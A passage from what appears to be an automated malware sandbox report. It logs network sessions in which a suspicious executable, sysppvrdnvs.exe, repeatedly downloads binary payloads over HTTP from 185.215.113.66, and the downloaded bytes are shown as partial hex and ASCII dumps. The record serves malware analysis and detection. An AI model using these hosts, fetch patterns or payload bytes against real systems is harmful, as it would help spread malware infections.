2e a5 ab 8c c7 c4 39 ee ac 1f df dd ad 83 61 53 40 96 ef 54 f8 d5 99 78 d0 5c 15 a6 e4 3a 94 aa 88 b5 29 9f 27 fe df f6 f1 44 8d bc dd e1 03 41 86 b3 e3 55 74 f6 93 e0 52 2d 67 f4 5a 3e ac f1 42 1d 05 88 0b c7 71 98 35 3a 39 b0 14 2a a2 79 0b 6e 7a ab 34 d0 5e f3 c0 be 79 a1 6e 92 b2 77 e0 36 5f b2 e6 fd 89 91 4d 37 1c 32 b3 ee 70 af 6a 4a 74 8a 23 65 0e 7a c7 53 57 d8 80 68 b7 [TRUNCATED] Data Ascii: [yMx3+_[/CLIK0pPaGjqr>+"M()nf+m8`@'V]_{1&$"L+'l5]1Z!H\|J!/=:jr~2T^R!tt3%_/:p@Z-.9aS@Tx\:)'DAUtR-gZ>Bq5:9*ynz4^ynw6_M72pjJt#ezSWh4{q/br( olSu5nw;i#:X<<T>cRfzgzDG:]]G=su`#Zt9Xw48~$YJ<0}~,4SJGJwzbyt;9C#<$v@0`/"8bn,]E-VpYcGa:q2oWO,N3#@my1~-I-.!m<fa^ak=FzeMq/(\R\)KwxlM7LD G+m\E~Xt:\|2EX<\P3,qDxRG,~TaZ~v{zJ[a$y#gR<v\>cjn)?kSxP07@Pe@ZL6RvoexXOK4For'A8K%?RtGVB}c7!8=f&d
Oct 26, 2024 07:27:50.560987949 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:49 GMT Content-Type: application/octet-stream Content-Length: 16128 Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT Connection: keep-alive ETag: "66f3a973-3f00" Accept-Ranges: bytes Data Raw: aa ff 5b 85 19 de 79 93 4d ba ae a5 78 a9 fd 33 2b 5f 5b 98 2f e2 90 9b 43 bd 1a 0d 04 b2 f0 0d e0 d2 4c b9 c7 49 cc d7 d9 86 fc 8a cb a9 8a a3 e8 4b 30 70 cc 50 61 19 a3 47 82 6a 87 71 cd 8c 0c 72 ae da 3e dd b2 2b 22 4d d7 28 a6 af 1c bc 29 de 1c 02 e5 f1 a6 6e 66 9e dd 18 a8 da 2b ff 6d c4 8d ee fd 38 60 ba e4 86 f4 d7 40 df 27 56 a7 f2 ca 5d 5f fa 84 aa 7b cf 31 80 26 84 f3 f2 df d5 e9 24 ed 82 c6 22 c1 fd cf 14 bb 4c 2b d9 27 6c f4 35 00 10 82 a6 1e bb 1d cf 5d 31 5a dd 21 48 df 7c c6 bd aa 01 4a af 21 b4 2f b4 3d 3a 6a 72 7e ad 32 ca d0 54 ff fa 5e 52 a6 ae 21 74 90 74 88 9f 33 25 5f 1c 2f 3a cd 70 f4 a3 40 f4 de 5a 2d 2e a5 ab 8c c7 c4 39 ee ac 1f df dd ad 83 61 53 40 96 ef 54 f8 d5 99 78 d0 5c 15 a6 e4 3a 94 aa 88 b5 29 9f 27 fe df f6 f1 44 8d bc dd e1 03 41 86 b3 e3 55 74 f6 93 e0 52 2d 67 f4 5a 3e ac f1 42 1d 05 88 0b c7 71 98 35 3a 39 b0 14 2a a2 79 0b 6e 7a ab 34 d0 5e f3 c0 be 79 a1 6e 92 b2 77 e0 36 5f b2 e6 fd 89 91 4d 37 1c 32 b3 ee 70 af 6a 4a 74 8a 23 65 0e 7a c7 53 57 d8 80 68 b7 [TRUNCATED] Data Ascii: [yMx3+_[/CLIK0pPaGjqr>+"M()nf+m8`@'V]_{1&$"L+'l5]1Z!H\|J!/=:jr~2T^R!tt3%_/:p@Z-.9aS@Tx\:)'DAUtR-gZ>Bq5:9*ynz4^ynw6_M72pjJt#ezSWh4{q/br( olSu5nw;i#:X<<T>cRfzgzDG:]]G=su`#Zt9Xw48~$YJ<0}~,4SJGJwzbyt;9C#<$v@0`/"8bn,]E-VpYcGa:q2oWO,N3#@my1~-I-.!m<fa^ak=FzeMq/(\R\)KwxlM7LD G+m\E~Xt:\|2EX<\P3,qDxRG,~TaZ~v{zJ[a$y#gR<v\>cjn)?kSxP07@Pe@ZL6RvoexXOK4For'A8K%?RtGVB}c7!8=f&d
Oct 26, 2024 07:27:56.670548916 CEST	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:27:56.986756086 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:56 GMT Content-Type: application/octet-stream Content-Length: 10496 Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT Connection: keep-alive ETag: "67154d18-2900" Accept-Ranges: bytes Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED] Data Ascii: \|@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\\|wBvugOX% hr9:\|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c\|gL0)cM]oL{:En:?\|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49998	185.215.113.66	80	7404	C:\Users\user\sysppvrdnvs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:27:58.119330883 CEST	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:27:59.047216892 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:27:58 GMT Content-Type: application/octet-stream Content-Length: 10496 Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT Connection: keep-alive ETag: "67154d18-2900" Accept-Ranges: bytes Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED] Data Ascii: \|@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\\|wBvugOX% hr9:\|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c\|gL0)cM]oL{:En:?\|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
Oct 26, 2024 07:27:59.047233105 CEST	112	IN	Data Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96 Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O
Oct 26, 2024 07:27:59.047249079 CEST	1236	IN	Data Raw: eb f7 e1 3e b0 c8 e9 ca 8d d4 e4 c0 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b Data Ascii: >*B aw'&iEpRaMZ\|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7\|VbF9?gk{is6u
Oct 26, 2024 07:27:59.047270060 CEST	1236	IN	Data Raw: be 2f 61 3a 1b 4e 54 9f 16 74 9c d6 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc Data Ascii: /a:NTtKu"1X[8Ibdym-*\|+>a`<Z!%\| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E
Oct 26, 2024 07:27:59.047336102 CEST	1236	IN	Data Raw: 99 31 96 51 d2 49 8d 75 9f a1 b5 63 0b 3e 1f 18 b4 22 57 d9 8b 7c 31 98 16 87 ae e9 52 72 6d 5d c2 16 1d 54 31 c6 26 50 53 c5 b3 54 51 99 ab e5 bf ce ab 5a 8a 71 45 74 67 a4 63 0c 5b 55 2a 2c 09 40 f8 fc e9 05 9a 85 93 2b 1f c2 e7 ee b8 e5 f1 4c Data Ascii: 1QIuc>"W\|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh[
Oct 26, 2024 07:27:59.047354937 CEST	1236	IN	Data Raw: 93 05 8f 66 d7 1c 1e 74 35 55 8e 3e 31 a8 75 b5 61 82 75 bf 07 d4 ae 95 c4 56 90 7c cb 70 96 18 0f 8d 94 0d ed c5 38 19 fb 22 c5 0b 12 87 60 3b 81 03 12 75 54 3b 9d 5f 49 0f c9 02 17 62 6d e2 fe bb 70 70 d5 80 63 88 df db 26 ba b5 f0 ea 96 e1 99 Data Ascii: ft5U>1uauV\|p8"`;uT;_Ibmppc&D5HCwjrH&532a`#&AWxd<,v\]Hhq"4kW'{wR4BA=g-S*M^~lv^b%\Z)zW0EZSM#x6
Oct 26, 2024 07:27:59.047375917 CEST	848	IN	Data Raw: 97 a0 8b 45 e0 ec f0 2c 50 58 8e 3c ef bb 8f 8f 8e 79 75 0a ad 02 36 43 01 14 de 49 45 eb 9b 46 60 fc 21 cd 8c ae 55 be 65 24 01 75 0e cf ef 97 39 fb a0 af 9d 72 ee ee e6 3b 53 91 15 f0 77 de 88 6a f6 e4 10 46 f4 22 86 d5 e8 fe 64 bd bf 16 44 78 Data Ascii: E,PX<yu6CIEF`!Ue$u9r;SwjF"dDxsWY/"4\|bob`\|bScV<N^SM%Dz*a0)tao(Jag{;5? w7m1j"zAJV,
Oct 26, 2024 07:27:59.047389984 CEST	1236	IN	Data Raw: 8c 54 23 d9 2f 57 1f 55 75 be 9b 15 34 db 14 58 20 68 c2 40 f2 66 0e db 0b f4 29 9a cf 5c 58 e8 db 55 3c 3e 0e 29 48 03 72 1c d0 ec 84 a4 3e b0 ab 4d 8f 34 1f c7 01 19 2e 7b e4 98 6f 39 14 98 f0 59 68 8a 69 3d 64 2e 73 e5 2f 9a b6 dd 88 e7 8c 7e Data Ascii: T#/WUu4X h@f)\XU<>)Hr>M4.{o9Yhi=d.s/~(>+s[0p-\|EmzJT,_#L}HQyt{Ja%Z>CIyGIP.]$,;S,yj:tl"s\j8?<;v-#
Oct 26, 2024 07:27:59.047409058 CEST	1236	IN	Data Raw: e2 93 2a 13 2e 4f a8 d5 55 e4 d0 c9 40 82 3a 06 60 23 f4 d8 eb 34 7f 35 2f fe a5 60 f0 93 3a 4a 49 5d 3c 7f 4b b7 cf 44 bb 15 8a 5a 57 64 54 36 61 f0 4d 87 a7 65 70 3e bd 61 a8 d1 af 3c fa 57 bb 79 6d a6 2b ce 4f 64 6b 97 b5 0f 58 11 61 4b cf 59 Data Ascii: .OU@:`#45/`:JI]<KDZWdT6aMep>a<Wym+OdkXaKY;,SPXD@`7Geq NW(EK0s (u\ERH4A\|0JQS=QtAcJ,%Y]*Iw31Zz2
Oct 26, 2024 07:27:59.047415018 CEST	424	IN	Data Raw: ac 10 0c c7 5a 43 15 b4 ce 65 6e 2e 9c dc e3 c3 2b b7 42 05 d8 5d ef 04 3b 6b d4 ce d8 b9 1f a1 04 2a da 3f 38 05 07 d8 a3 1a ec ca 05 2b 32 6b c1 5c 20 ba 70 0b a4 b8 b5 51 1a 5b d2 9e 72 9b 03 4c 2d 7f 89 5a 05 a6 28 8a 1e 64 2c f1 24 ae 90 87 Data Ascii: ZCen.+B];k?8+2k\ pQ[rL-Z(d,$njhP%YG'93T45NnMb4.]a%%=\]aC:U{zaSy))=noXQ:hSRCoDcW"hK`O$
Oct 26, 2024 07:27:59.053025007 CEST	725	IN	Data Raw: d9 cc 59 8d 0a b9 9f 63 24 0d 7f c0 50 88 3b 2e e3 73 5e 58 e8 de 22 40 a5 4e dd 19 af 11 fa a6 b1 6e 86 88 3e 8e a8 24 d9 32 9a e2 97 fa 59 1a 2b af 4a 40 59 7d f6 2c 1b 8d 13 3f ab 93 81 8f e6 87 72 9b ef 14 f9 60 92 e3 ff da da ca 34 31 cb 8c Data Ascii: Yc$P;.s^X"@Nn>$2Y+J@Y},?r`41RmU\gdb.6F`:+PJ] NB<Ru?QOFNxT+,@cp1/Fw@#y$wHsa!z_NwwofcwHsyGPgO/
Oct 26, 2024 07:28:05.671564102 CEST	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:28:05.957269907 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:28:05 GMT Content-Type: application/octet-stream Content-Length: 13568 Last-Modified: Tue, 22 Oct 2024 12:10:16 GMT Connection: keep-alive ETag: "67179628-3500" Accept-Ranges: bytes Data Raw: 0c 11 18 17 3d 7f 82 02 a6 24 36 4b 11 62 4d 55 d2 81 18 a8 7b ac b4 99 13 ea 95 14 cc 97 97 e2 0a 71 67 8a f6 90 c5 ca 7a 7b 56 bb fa e8 89 09 55 1a 05 57 8f 9c 1a 81 d8 bb 44 82 88 57 06 b0 a8 b1 0d 7d 50 5d 73 d2 54 4b d9 0b b0 cd a7 15 33 5a 57 25 7a d1 92 b0 cc 68 22 98 ff fd 1b 98 b0 f5 65 52 62 23 6d 48 84 63 2c a5 ce 1c d7 7e 20 81 7c 51 12 ee 07 70 82 1e bb bd 5b c1 57 cc 9f 3b 07 de 21 89 69 22 52 a2 b3 ac 41 42 e4 9f 74 46 e4 c5 ff 6a 73 b7 e0 c8 5f 4b 1f cc 28 e3 35 c9 6a 94 90 c9 95 c3 85 52 2c ae 57 13 b6 c7 b3 65 41 44 cb 6e cf 7e 5a 38 88 3a 70 d6 16 06 5e 35 43 a9 4c 56 d1 91 19 cf 12 60 0e f4 0e 93 ce ed f1 59 ab 0f ac b8 08 db 75 8f 57 bd 3e 74 90 a5 b5 79 a1 e7 5c 27 4a 05 b2 04 bb fc f0 de 98 12 16 00 a4 94 30 c4 34 a7 3f 3d d1 48 9d 54 69 63 38 91 b3 31 0e e5 1c 1b 3b 56 e3 53 a0 7c af cd 1f e8 b5 94 ca 54 f5 68 9c e2 81 d7 79 54 fc 2b 6d ba e7 01 91 17 71 86 42 4c 6b dd ff 4f a6 b4 df 21 b1 1d aa 7b 15 e2 4c ad c1 62 52 91 b1 1e ba e8 86 3c 96 57 ad 50 ef 4f 07 df 8e c3 28 72 [TRUNCATED] Data Ascii: =$6KbMU{qgz{VUWDW}P]sTK3ZW%zh"eRb#mHc,~ \|Qp[W;!i"RABtFjs_K(5jR,WeADn~Z8:p^5CLV`YuW>ty\'J04?=HTic81;VS\|ThyT+mqBLkO!{LbR<WPO(rVc=Tb''+DZE"rJ:h}nw1~z:/;fwH`^D\|%F8MD)A_uhi\:h%~!a>&cbV)g$V]Bg1v@%<+({Ps?'f#[V>%}sKu~gWA09-#98wSKfvZgi<)X>rRj9[t6'G*\3+veYh_9^H-'BIh=M8Nz-nt>+yJMpWPLkPyW"y~&ecMz6sC!J`mS?2"OR]N xcxkit9f#:a#C"Ql0p{{rtE:r:'lL]!poXAdOq'Fa\|yM{x;!++H.}bpp8h;qLLa<x<j

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	50000	185.215.113.66	80	7404	C:\Users\user\sysppvrdnvs.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:28:07.031984091 CEST	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Oct 26, 2024 07:28:07.933346033 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:28:07 GMT Content-Type: application/octet-stream Content-Length: 13568 Last-Modified: Tue, 22 Oct 2024 12:10:16 GMT Connection: keep-alive ETag: "67179628-3500" Accept-Ranges: bytes Data Raw: 0c 11 18 17 3d 7f 82 02 a6 24 36 4b 11 62 4d 55 d2 81 18 a8 7b ac b4 99 13 ea 95 14 cc 97 97 e2 0a 71 67 8a f6 90 c5 ca 7a 7b 56 bb fa e8 89 09 55 1a 05 57 8f 9c 1a 81 d8 bb 44 82 88 57 06 b0 a8 b1 0d 7d 50 5d 73 d2 54 4b d9 0b b0 cd a7 15 33 5a 57 25 7a d1 92 b0 cc 68 22 98 ff fd 1b 98 b0 f5 65 52 62 23 6d 48 84 63 2c a5 ce 1c d7 7e 20 81 7c 51 12 ee 07 70 82 1e bb bd 5b c1 57 cc 9f 3b 07 de 21 89 69 22 52 a2 b3 ac 41 42 e4 9f 74 46 e4 c5 ff 6a 73 b7 e0 c8 5f 4b 1f cc 28 e3 35 c9 6a 94 90 c9 95 c3 85 52 2c ae 57 13 b6 c7 b3 65 41 44 cb 6e cf 7e 5a 38 88 3a 70 d6 16 06 5e 35 43 a9 4c 56 d1 91 19 cf 12 60 0e f4 0e 93 ce ed f1 59 ab 0f ac b8 08 db 75 8f 57 bd 3e 74 90 a5 b5 79 a1 e7 5c 27 4a 05 b2 04 bb fc f0 de 98 12 16 00 a4 94 30 c4 34 a7 3f 3d d1 48 9d 54 69 63 38 91 b3 31 0e e5 1c 1b 3b 56 e3 53 a0 7c af cd 1f e8 b5 94 ca 54 f5 68 9c e2 81 d7 79 54 fc 2b 6d ba e7 01 91 17 71 86 42 4c 6b dd ff 4f a6 b4 df 21 b1 1d aa 7b 15 e2 4c ad c1 62 52 91 b1 1e ba e8 86 3c 96 57 ad 50 ef 4f 07 df 8e c3 28 72 [TRUNCATED] Data Ascii: =$6KbMU{qgz{VUWDW}P]sTK3ZW%zh"eRb#mHc,~ \|Qp[W;!i"RABtFjs_K(5jR,WeADn~Z8:p^5CLV`YuW>ty\'J04?=HTic81;VS\|ThyT+mqBLkO!{LbR<WPO(rVc=Tb''+DZE"rJ:h}nw1~z:/;fwH`^D\|%F8MD)A_uhi\:h%~!a>&cbV)g$V]Bg1v@%<+({Ps?'f#[V>%}sKu~gWA09-#98wSKfvZgi<)X>rRj9[t6'G*\3+veYh_9^H-'BIh=M8Nz-nt>+yJMpWPLkPyW"y~&ecMz6sC!J`mS?2"OR]N xcxkit9f#:a#C"Ql0p{{rtE:r:'lL]!poXAdOq'Fa\|yM{x;!++H.}bpp8h;qLLa<x<j
Oct 26, 2024 07:28:07.933391094 CEST	212	IN	Data Raw: c5 f6 81 b2 5c be 3a f2 f4 a0 69 51 cb 1e 7a 65 63 1b 5e ad 0c 1e cb bc 15 0c c8 3c fd 96 62 f2 d2 3b 0a d0 1e 9d 66 0c cb 26 ef d1 f3 6e 2b c7 40 85 15 6d 0d 88 4b f9 89 10 2c 37 76 33 d6 5d a0 0a 79 c4 65 0a bc ad 27 98 0e b2 33 fc 54 5c f2 dd Data Ascii: \:iQzec^<b;f&n+@mK,7v3]ye'3T\Sk}):rN]WO]1G>&!>dK@i[]LzA)0N$w\|n=29-
Oct 26, 2024 07:28:07.933449030 CEST	1236	IN	Data Raw: 42 fc 42 df b7 b7 f3 29 e3 7b d1 26 5a c7 49 32 0d 65 8a a5 6a f7 e4 d5 60 20 91 d3 74 10 ce 33 ff bd 7e 25 e2 51 42 fe 63 3d e9 32 f2 e4 5d 93 5c 4b 7f 04 99 cb 1a 85 1b ed c7 1d 1c eb 11 d6 36 d8 c2 11 57 e8 d6 f2 aa 71 3e c5 d7 b1 1c f4 a2 a0 Data Ascii: BB){&ZI2ej` t3~%QBc=2]\K6Wq>d?H4$*e[ist;0BeO#IeShA+< .Gw9`KCcv^21p P2_ri~,T31;TF^hT\t})tm
Oct 26, 2024 07:28:07.933485031 CEST	1236	IN	Data Raw: d5 8b a3 e0 ec 72 b0 ed a3 3a 73 e3 ac 27 8b 18 ae bb 5d 87 aa b3 db 40 94 0e 2d 3a 4e fb 12 dd 3d f2 dd d2 dd a3 72 80 4d 76 81 af 56 a9 06 82 ae ff 8a 79 49 37 1c a2 b7 3a 25 ed f2 08 ab 4d 8e dd 95 b1 5a 7d 61 fb d3 0b d2 02 20 1c 85 9c e0 7f Data Ascii: r:s']@-:N=rMvVyI7:%MZ}a OaYrPQ;\|<5c0aFh){B9hT-\|`56el/9uLltfDO\|CVi-\|R)
Oct 26, 2024 07:28:07.933516979 CEST	224	IN	Data Raw: 6d 04 43 b9 79 60 4f 47 2a b3 06 4b 9f 7a be d0 c0 38 dc 6c 17 43 1e 74 6c 00 69 b0 8d 22 0a 73 79 98 ca 5f 43 59 c7 44 73 8d 02 a0 d3 49 7e 61 8a bd dc b0 82 db 37 0b 45 a1 57 3c 51 92 f5 a2 fc aa c2 9b 3a 89 7a e3 e8 0c cd c5 9c 06 84 c4 a4 02 Data Ascii: mCy`OG*Kz8lCtli"sy_CYDsI~a7EW<Q:z\,2`+tpk@T-#_DswpTn[/Ar"6k=G]5-[<FMBL]T"vV@#>:LkEIB
Oct 26, 2024 07:28:07.933585882 CEST	1236	IN	Data Raw: d9 49 dc f4 9d ef 71 10 1c 49 fa 1e f6 28 22 9c 01 e3 c0 27 25 4f 98 66 db f8 8b db 31 5d 3c 42 99 89 4c 01 5b b1 fe c1 b9 fe e7 1c a4 eb 37 c9 b4 e7 86 eb 94 dc 07 15 48 7d ce f0 81 f5 56 56 7f c0 94 10 38 07 d7 17 62 ea 48 1f 8e 44 ee a0 a5 a0 Data Ascii: IqI("'%Of1]<BL[7H}VV8bHDW?"}o'Mr,rG`-;fDC(t@JxbE{YmNiX`>_!vfEp.[tI;snH,koG<P
Oct 26, 2024 07:28:07.933625937 CEST	1236	IN	Data Raw: 06 8e f7 81 5b 52 f8 eb b9 78 be d7 69 60 5a e0 69 b5 e9 fb 1d 8b 1b 23 3f 76 0e 6d ea da 92 02 a2 ae ca d0 01 74 7a df 14 12 61 6a 02 de ea 91 7d 47 fa 4b 08 f0 88 31 2a 25 29 52 60 71 ee d0 ec 2b 91 b7 1c ac 2e 7b e2 b5 86 97 28 ad 2d 12 24 48 Data Ascii: [Rxi`Zi#?vmtzaj}GK1*%)R`q+.{(-$HK"qNjgRy@b/"C6HS<_@m~L-"P{\}[~)(RH{sM:hL]g`n)\|Dym,ZsvtW;Y?!v)"A\|kOB
Oct 26, 2024 07:28:07.933656931 CEST	124	IN	Data Raw: 26 a0 5c 94 49 42 a4 cf 69 64 63 b7 57 59 12 27 7f 92 67 90 ae 49 fc 8b a4 c4 dc 9b 93 a7 f7 1e 94 e1 27 18 30 ba 43 f8 2d 41 9a 50 a1 34 19 a9 b4 aa a0 67 39 65 31 12 c9 cc a2 a0 5c 66 d4 92 86 d0 f4 59 10 8f e6 73 72 dd 0e 62 2c b4 d7 01 dc d7 Data Ascii: &\IBidcWY'gI'0C-AP4g9e1\fYsrb,6dhlNiu?B;%I
Oct 26, 2024 07:28:07.933692932 CEST	1236	IN	Data Raw: a0 7f 71 ab a7 1d ed ac 9d 8a d2 cb 31 0e b8 b8 f7 49 2d 80 1b 0a c1 b1 c1 f5 fe d6 ee 5e 78 72 fb 14 f2 d9 70 8f 5b 63 85 85 9b 5f c7 40 b4 53 ac 8d 50 1a 12 2e f0 a7 fd 64 35 d7 18 2f 64 c3 b8 34 db e8 7d c3 1a 50 3a 26 b9 46 fa b3 ec ff fe ef Data Ascii: q1I-^xrp[c_@SP.d5/d4}P:&F!z.('X~l'-W&{@(Pl%@%&g~j1/{9RG"$(!G3_Q+#\|RT<Vf:]}N`P~\|Nh-
Oct 26, 2024 07:28:07.933728933 CEST	1236	IN	Data Raw: 46 c4 78 9f eb 2c ed 5f bc a6 48 b3 12 f5 4d 01 f2 26 be 1c 35 0f 0e cc 7c a1 69 e9 a8 d5 0e 62 d1 44 ea 48 69 70 e4 5c 20 a9 f8 b2 b9 2a 53 80 3c dd b9 ea dc 38 77 32 e0 ab 87 59 00 e1 35 fb 83 1c 4f 7f 41 3f 1a a6 ed d4 0a 8c c7 e8 57 5b 47 eb Data Ascii: Fx,_HM&5\|ibDHip\ *S<8w2Y5OA?W[GJu"Yy }Xe29%W@R#33\2xHDwT6X!";RS{tO\>:$~@w!.k0.nCh<Hf{wGAO#NQgo=\|96
Oct 26, 2024 07:28:07.939090967 CEST	1236	IN	Data Raw: c6 08 89 e8 ce 39 52 72 81 0e ab a6 1a 68 59 73 47 69 d2 28 c9 6d 79 e6 57 78 20 c2 4b dd ed dc 92 15 50 95 a1 93 35 34 72 3c 01 06 6e 80 51 2a f3 e8 6d 84 ec 9e 03 73 c8 a5 aa 0d 59 14 df c7 e6 9c b3 64 1e 41 ff 47 20 62 a2 b3 91 d1 25 0e 31 03 Data Ascii: 9RrhYsGi(myWx KP54r<nQmsYdAG b%1!a^s{VK7$?n7ll}}2]J-qUtt.e,w=y3]J\|K_uj.fbPO^\? A&.*TiVYx0d7utnI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	50002	91.202.233.141	80	7404	C:\Users\user\sysppvrdnvs.exe

